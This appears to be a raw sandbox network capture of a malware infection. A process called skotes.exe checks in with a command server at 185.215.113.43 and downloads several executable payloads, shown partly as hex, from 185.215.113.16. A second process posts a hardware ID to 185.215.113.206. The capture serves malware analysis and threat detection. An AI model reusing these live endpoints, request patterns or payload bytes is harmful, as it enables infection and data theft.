00 00 f0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 10 86 00 00 04 00 00 d8 08 1e 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$!J@$@$@$@$@$@$_@$@%@$@$@$@$Rich@$PELd@ZBn@h! @T@.rsrch!@d@.idata B@ ) B@qficpnjw0k@unknfscp@.taggant0"@
Dec 10, 2024 00:43:18.925280094 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 10, 2024 00:43:18.925379992 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 10, 2024 00:43:18.925517082 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 10, 2024 00:43:18.925528049 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 10, 2024 00:43:18.925646067 CET	1236	IN	Data Raw: 79 5e 0b ef da be bb 27 c5 49 12 03 ea 04 0a d2 d1 dd 6e d9 56 18 b7 01 fc ca 91 bf 9f b0 93 6f 14 99 8b ce 98 6a 33 b5 a3 16 6d b1 51 6f 85 1f 7c 3e be 88 a3 a5 a2 cb 8e d4 28 d5 41 89 07 84 6d b0 f9 23 c0 f2 25 a8 fb b6 cd 11 96 84 6e 06 70 30 Data Ascii: y^'InVoj3mQo\|>(Am#%np0{3v\PWqMb@;jn "T:@{<yZ}dP}t]px]7snWzZ}<`{_847ApU0nXbY}CYD'
Dec 10, 2024 00:43:18.925657988 CET	896	IN	Data Raw: 23 56 9b 07 b1 99 64 21 5f 5c 18 07 96 f6 6c 5e 70 62 46 ab 38 81 36 f0 c2 e3 0d dc 80 7f d1 11 45 83 67 14 98 04 64 93 a1 84 40 2c 56 e8 ae 19 80 9c 05 94 ce 73 99 af 41 dd c5 b7 7f 34 26 68 b9 30 32 83 75 04 4f b7 ef b8 5c 7f 3c 81 c9 f7 c5 b1 Data Ascii: #Vd!_\l^pbF86Egd@,VsA4&h02uO\<"<s?x>='A.,'J\Cc%DR=xY\|@D?X;g-<i\>QVq{_"=UG #X:h[E`vl\@+Kd3nLQ]"xO$=CeVAe
Dec 10, 2024 00:43:18.925816059 CET	1236	IN	Data Raw: 8a 54 a7 69 4f 45 14 f0 36 ad 2e 37 4f c1 1c b4 5c 3e 16 a0 3a 67 9d 28 45 97 6a b2 4e 9c 5b 87 0d ff 61 15 99 bc aa 08 e1 39 33 1e 1f d4 a8 02 52 2a 62 55 a2 a7 46 30 9f 12 53 fe 0b dc 75 eb f3 c0 55 ff f8 69 3a 39 15 c4 74 68 37 98 0f cd 37 c1 Data Ascii: TiOE6.7O\>:g(EjN[a93R*bUF0SuUi:9th77z>:Hi3&h, ? OMsYAw4D7Y1&<'+7P/tar4g<]NdDCA#`76Dp_a?Qe@HX"{;oF@-GCvEH;LLOk
Dec 10, 2024 00:43:18.925825119 CET	224	IN	Data Raw: 0d c7 11 0b ec 69 af 1b 84 43 af 08 cc 90 5d 23 76 be 48 1c 11 9c 83 d0 12 0b 7f 63 fd 6e 14 25 0c b6 74 dd a8 c6 87 dd fa f7 1f b5 1c ab f7 d9 0f 5c 2f 84 16 c0 ba 8f 97 52 83 e2 a1 50 49 ec 5a 12 43 98 87 a5 13 f7 9e a2 20 06 59 7c 53 4a 09 03 Data Ascii: iC]#vHcn%t\/RPIZC Y\|SJ6^[m_anuPp%9_MK8ZOTGE[37?eIJf#ku(~uK'4P?pWa^d0T-F34%n%he3/`35PbC=
Dec 10, 2024 00:43:18.925833941 CET	1236	IN	Data Raw: 9b 89 28 30 85 f7 29 b4 74 84 66 1e 40 d2 8d d1 8c b8 f4 2c ec 80 da 7b 05 ef 1e 70 40 20 90 d5 00 e8 fe fb 9e 0d dc a3 e4 68 79 5f 99 95 63 2f ee 86 81 46 4f 52 fa b4 79 1d 0d a8 ff 80 22 8e 94 25 94 e4 43 25 12 ff c8 98 3f 27 a4 c6 b0 15 b6 c6 Data Ascii: (0)tf@,{p@ hy_c/FORy"%C%?'~%;bKOg!S<bFYY#Sl)L8xezxO \|ZM9$,\S%Fwb)[(tR '6_`pSHIL]"QQa86(!7m
Dec 10, 2024 00:43:19.046065092 CET	1236	IN	Data Raw: 7d c0 00 e0 d7 30 df 91 ef 43 4c d1 c7 9f 62 f2 f5 b8 af 0d d9 52 8b 21 9a c0 3d f2 77 47 a6 09 79 df 1e 11 ee 6a ba e4 56 9e 08 c1 37 71 27 8d 4e 81 7e 23 c0 b9 79 53 94 11 36 0f 2b 83 66 26 8b 4c 74 0d 5b 4b 9d e7 94 9b 77 13 dd 72 60 ac e7 06 Data Ascii: }0CLbR!=wGyjV7q'N~#yS6+f&Lt[Kwr`tx8&O9[N2r4p$XtS-G9FgbwjT1tt>a4QG}4$3)x!mr+c]<xq']mh+fG7AN);kB=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49829	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:43:24.579797029 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 33 35 35 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013551001&unit=246122658369
Dec 10, 2024 00:43:25.930890083 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:43:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49830	185.215.113.16	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:43:26.389360905 CET	55	OUT	GET /luma/random.exe HTTP/1.1 Host: 185.215.113.16
Dec 10, 2024 00:43:27.728035927 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:43:27 GMT Content-Type: application/octet-stream Content-Length: 1858048 Last-Modified: Mon, 09 Dec 2024 23:15:46 GMT Connection: keep-alive ETag: "67577a22-1c5a00" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 ea b9 55 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 dc 03 00 00 b2 00 00 00 00 00 00 00 e0 49 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 4a 00 00 04 00 00 39 30 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c 40 05 00 70 00 00 00 00 30 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 41 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELUgI@J90@\@p0A B@.rsrc0R@.idata @V@ *PX@beewzkou/Z@avotpigkI4@.taggant0I"8@
Dec 10, 2024 00:43:27.728123903 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 10, 2024 00:43:27.728133917 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 10, 2024 00:43:27.728351116 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 10, 2024 00:43:27.728360891 CET	1236	IN	Data Raw: 55 ac ef a3 6f c1 99 81 b4 6e 0a 80 21 7f 9a be 1c 24 53 57 b5 fc 6b c2 04 71 ee bd e5 c9 1a 03 ac 47 39 ab a5 36 8c bc bb bc ba 87 60 ab f1 be e2 1c b8 bd 19 7c 74 b6 f0 70 6d 2c bf 30 92 dc ec c0 6c 07 5d c1 b6 f7 73 75 90 da 6a 54 1f bb 34 43 Data Ascii: Uon!$SWkqG96`\|tpm,0l]sujT4C[ )U,<9d?kZR-\&aS)=fwRL/d},E:0\Zr1^m^9<UCzy94}g&kW}Rc*T542ws:!Mskq)&im']LQ\e#
Dec 10, 2024 00:43:27.728379965 CET	1236	IN	Data Raw: 43 d8 70 d7 be e2 3a 61 22 73 a2 0e e0 7c a0 6a 79 36 21 ba f8 84 a2 30 8d 2d ee fb 33 8c 6b 6a 02 f3 a2 2e cc ca 11 e2 6d c3 1f e0 e1 91 0d 8b b8 0d 7f fa 6c 9a 29 92 b1 8b e8 ca 35 c9 59 c2 9b 2d 2a ff 5a 66 be 9c 3e 1b fb b2 f4 39 26 4d 82 66 Data Ascii: Cp:a"s\|jy6!0-3kj.ml)5Y-Zf>9&Mfu"jd);t/NH7cL}B7/)QoJA0pB3 `3Df7CgqCnmefL(?0KCT&&?rCDBqS
Dec 10, 2024 00:43:27.728390932 CET	1236	IN	Data Raw: ee 58 2a 0b 8b bb ac 58 f9 d1 b4 c1 98 2f 73 0d 9d 62 b2 52 43 82 31 f3 f2 1b bb 5f e3 c7 fa db dd 64 85 c6 ef a8 2c ff 44 31 38 99 28 7c 20 10 a5 96 69 9b 9a b4 77 3d 10 25 a1 37 db a9 6c d3 01 26 ac a3 f5 fc 64 a5 06 44 6a e2 f2 f4 53 cc 23 36 Data Ascii: XX/sbRC1_d,D18(\| iw=%7l&dDjS#6sEX_qKrWn\G4.>sJ)!c.5nj8>yS8$]yrQF755?+}CE=9SC'7(Ss*al
Dec 10, 2024 00:43:27.728667974 CET	1236	IN	Data Raw: f9 4f b4 ee 9e 99 f2 bb 64 67 53 ec ca 68 da c3 ca e8 d3 0f cf 30 48 7c 44 3c e8 f9 7c 97 47 23 2d 46 97 2a 17 63 61 2e ae ba f6 2f fd 56 f5 43 d0 af 1f ad 3a 31 a5 31 d3 1c 3f 06 43 83 fc 0c d4 03 57 0a 62 72 e5 04 c4 76 fb f0 94 73 79 d3 ee 86 Data Ascii: OdgSh0H\|D<\|G#-F*ca./VC:11?CWbrvsys@$@\b+x2Z2{Z+z'j;H95$7[6Z;TN;b/4gj\|W/XNmC/dY]nUeJEwq8u16; 2eb=.p.M=[!A2
Dec 10, 2024 00:43:27.728678942 CET	1236	IN	Data Raw: d3 fc 90 ca 70 65 ba 22 08 c1 9e 5b 50 48 33 47 74 7b 0a 8d 28 70 51 ab e1 3c 22 b6 33 44 2b 37 61 3f 53 e3 d7 02 dd e9 de d1 64 b8 da c9 70 d1 f4 d0 74 a9 d9 00 29 d0 c1 bd ab 5b f7 c6 91 5d 67 4e 54 59 df 66 db b7 c8 fe 0b c1 73 8d de 54 96 95 Data Ascii: pe"[PH3Gt{(pQ<"3D+7a?Sdpt)[]gNTYfsTF] `D+*n,ShEr`1Le<&I4FBk_zR{r/{i9 "OHM6+my?)7?T_yOIx`?Qt
Dec 10, 2024 00:43:27.728816032 CET	1236	IN	Data Raw: fa c0 ae 1f ff e3 dd 11 a8 83 d9 a2 e3 73 06 af f2 11 52 1b d8 9d b2 e3 64 0d c9 12 63 07 e7 2d 98 c0 ce b3 38 f3 8d 52 d3 9f b0 85 b5 32 02 4e fb 30 58 3a e5 36 d1 a2 b5 71 30 c6 e4 18 9c 5a fa 0e f6 bf e0 5f 03 e5 a3 d8 4b e3 10 34 6d 4c 0c e3 Data Ascii: sRdc-8R2N0X:6q0Z_K4mLM4s'mSl5;:jY?33FEP~!`15L*2HP\|zy7){@t$D5+Y1zYC?kGWr \|d6A0<cN
Dec 10, 2024 00:43:27.849325895 CET	1236	IN	Data Raw: a7 ec f2 fa 8b f3 31 87 a5 fc 81 e3 f0 e9 37 ea 20 24 de 24 34 a8 7b 31 5c 9e 8a 73 94 5f 51 0a ca b1 83 ca a3 9f 91 43 67 fc 4e 29 34 d0 a2 a5 96 32 6e d2 a4 1b 58 19 fc 97 aa c2 7d 6b c9 43 6f 77 94 93 d6 37 bd ca 1f 85 54 57 54 2f 25 65 5c ef Data Ascii: 17 $$4{1\s_QCgN)42nX}kCow7TWT/%e\<ykaq39bD~GY7oegZ6M Pc?2Sdo)Kr0\|Pwe?y%.t1,Co[4-Q2EfS

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49852	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:43:33.294245005 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 33 35 35 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013556001&unit=246122658369
Dec 10, 2024 00:43:34.653117895 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:43:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49853	185.215.113.16	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:43:34.784465075 CET	56	OUT	GET /steam/random.exe HTTP/1.1 Host: 185.215.113.16
Dec 10, 2024 00:43:36.116825104 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:43:35 GMT Content-Type: application/octet-stream Content-Length: 1806848 Last-Modified: Mon, 09 Dec 2024 23:15:53 GMT Connection: keep-alive ETag: "67577a29-1b9200" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 28 01 00 00 00 00 00 00 50 69 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 80 69 00 00 04 00 00 6b 09 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$ ddds\|Fir^m[gmKbgdwwEeRichdPELdTg(Pi@ik@M$a$$ $h@.rsrc$x@.idata $z@ *$\|@jmepqeibPO~@vxwpxfml@ij@.taggant0Pi"p@
Dec 10, 2024 00:43:36.116905928 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 10, 2024 00:43:36.116915941 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 10, 2024 00:43:36.117162943 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 10, 2024 00:43:36.117177963 CET	1236	IN	Data Raw: 86 39 76 c7 48 01 9b 2a 88 f2 59 d3 76 ba b6 0d c5 a6 02 34 49 c2 bb 43 e1 ba 7a e8 e4 46 f3 3c b9 80 eb 55 c9 08 e3 0d 72 ec cf 89 a7 58 b5 57 91 5a d3 53 8d ca c2 17 75 ba 2e 7b 1e ab 2a 6b 84 be 16 7c cc 44 f3 53 86 92 be fb dc 9a 02 53 cb 5b Data Ascii: 9vHYv4ICzF<UrXWZSu.{k\|DSS[AbdcvWcH9R/+y/Q?PF,}3xS%m0I>E.02w1AI;3oJ+p3zqx5E+W`0JpJCP*W9&X
Dec 10, 2024 00:43:36.117192030 CET	1236	IN	Data Raw: bb 62 b5 8f e3 4a ef 2a 84 bb 7f f6 60 8f 4d c2 97 a2 36 9a b6 5a 08 43 fe 65 18 a0 b3 aa a3 62 59 e0 01 99 bc e5 53 03 aa e9 1a d6 f0 ed 02 08 e2 29 02 bd 1b 8d 97 03 be 21 fd 4d 96 b8 c4 c4 fc f3 b5 b3 3c d5 01 e9 94 cb b4 dc 74 da 02 c7 33 c5 Data Ascii: bJ`M6ZCebYS)!M<t3-oomJ@Ii9Awu&\|1Nat9?(1'%BX06(dW)$GH)Pud,8?ykn:CW,#&&xecMv
Dec 10, 2024 00:43:36.117212057 CET	1236	IN	Data Raw: 87 f1 ea c7 ba 42 1a bc 3c b0 fc 5a b4 a3 39 4d bb 26 0a d4 83 d3 72 4e 77 00 b3 5a 09 ba 16 ac 6c 60 0e aa fb f2 4a 59 f1 46 19 54 41 07 3f 12 c3 5c 7d 52 bd a2 86 37 94 b6 a7 4e 27 86 13 2c 7f 9a 04 58 51 d3 22 cf ba 78 d3 33 bb b2 ca c7 e0 3b Data Ascii: B<Z9M&rNwZl`JYFTA?\}R7N',XQ"x3;\|J3vUCJ6@;BuGINRNZStH"#_Za>fA+dDF->.8Rm >2$d{WEYWn=HKZ?"
Dec 10, 2024 00:43:36.117557049 CET	1236	IN	Data Raw: bd 89 04 2f 67 9e 62 bf 3b 25 03 50 66 45 5f 05 75 b4 0a e8 3c 33 c0 46 bc d2 02 5a 45 07 db 43 a3 c9 99 c8 b4 b3 ba 52 69 46 b9 57 dc e0 e9 57 4d b4 19 80 bc aa 7f db 80 36 e2 23 25 b4 b8 6f b3 12 7e 22 db e9 02 54 e0 2f 23 ee 74 f6 e9 2b 69 00 Data Ascii: /gb;%PfE_u<3FZECRiFWWM6#%o~"T/#t+i3v\|h\g\!P^FS"YYN?wzY%;+<JYwPOi8+ntH,DF2\18\*;p($k}-+Ft
Dec 10, 2024 00:43:36.117598057 CET	1236	IN	Data Raw: 29 bb 39 c1 b6 f7 09 58 89 1c f7 59 b5 8e b6 9f 3c fa 2b 06 fa ba 22 30 39 96 04 2b 69 b7 21 c9 3e 02 05 5c 75 46 53 be 7c b1 c1 46 99 e2 0d 5a 64 ba 0e c6 3e 4f 01 c9 fb 47 dc fb be ab f2 14 65 ab b5 67 b6 2f 7b c6 ba 3a c3 20 41 36 3d 59 3d 32 Data Ascii: )9XY<+"09+i!>\uFS\|FZd>OGeg/{: A6=Y=2FyMt"Hj #\|@F{G8I)*:4'q""CF\uZvE-'!`8!["t#wd1IB=;B
Dec 10, 2024 00:43:36.117611885 CET	1116	IN	Data Raw: 98 b4 0a c8 48 4e 80 06 cb c0 93 f1 dc 36 12 0e 31 b3 ee c5 b6 5f fa 3d c3 26 77 59 55 a0 72 cd e1 75 fa d2 00 0e ba 5a a5 3f f7 c9 d9 b7 04 64 03 c3 28 0c f9 46 1f 90 e6 f6 75 0d 5e a0 04 68 b3 5e 03 64 63 00 86 43 b6 32 a0 cb ba ba bd c3 e8 3f Data Ascii: HN61_=&wYUruZ?d(Fu^h^dcC2?sN7]G FCFA-GzH0-XenYYc0"T<;s!W12uE##Y`JjFzYm3fCFX@t37Es]V-Rbl+~
Dec 10, 2024 00:43:36.245404005 CET	1236	IN	Data Raw: 2b 40 07 bf 0e d1 16 0f 19 c2 fc 2d c7 b2 e8 f2 15 96 4e 2a b6 70 30 18 68 39 7e 54 ed 8d 50 42 56 ae 66 fd cc a0 ab 17 36 8f 60 34 54 ac 98 4f af 39 71 2e 8f f6 3b 31 59 7a 0f 1b 46 bf 80 2d 0e 75 0c 44 6d 3e bf 15 10 f1 19 51 dc e6 2c d3 f0 8d Data Ascii: +@-N*p0h9~TPBVf6`4TO9q.;1YzF-uDm>Q,y+K}SSO<4 HIb"p}sQCa>7@\A)2#taSlt4(GfCC%FYC"5:@W9"_[5jChjr

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49871	185.215.113.206	80	5592	C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:43:41.770940065 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Dec 10, 2024 00:43:43.151601076 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:43:42 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 10, 2024 00:43:43.156761885 CET	413	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDGDHJJDGHCAAAKEHIJK Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 44 47 44 48 4a 4a 44 47 48 43 41 41 41 4b 45 48 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 36 34 39 46 42 30 46 45 31 35 34 33 32 30 37 36 30 33 31 36 34 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 44 48 4a 4a 44 47 48 43 41 41 41 4b 45 48 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 44 48 4a 4a 44 47 48 43 41 41 41 4b 45 48 49 4a 4b 2d 2d 0d 0a Data Ascii: ------GDGDHJJDGHCAAAKEHIJKContent-Disposition: form-data; name="hwid"9649FB0FE1543207603164------GDGDHJJDGHCAAAKEHIJKContent-Disposition: form-data; name="build"stok------GDGDHJJDGHCAAAKEHIJK--
Dec 10, 2024 00:43:43.598812103 CET	210	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:43:43 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49872	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:43:42.384257078 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 33 35 35 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013557001&unit=246122658369
Dec 10, 2024 00:43:43.611303091 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:43:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49880	185.215.113.16	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:43:43.784953117 CET	55	OUT	GET /well/random.exe HTTP/1.1 Host: 185.215.113.16
Dec 10, 2024 00:43:45.126389980 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:43:44 GMT Content-Type: application/octet-stream Content-Length: 971264 Last-Modified: Mon, 09 Dec 2024 23:14:03 GMT Connection: keep-alive ETag: "675779bb-ed200" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 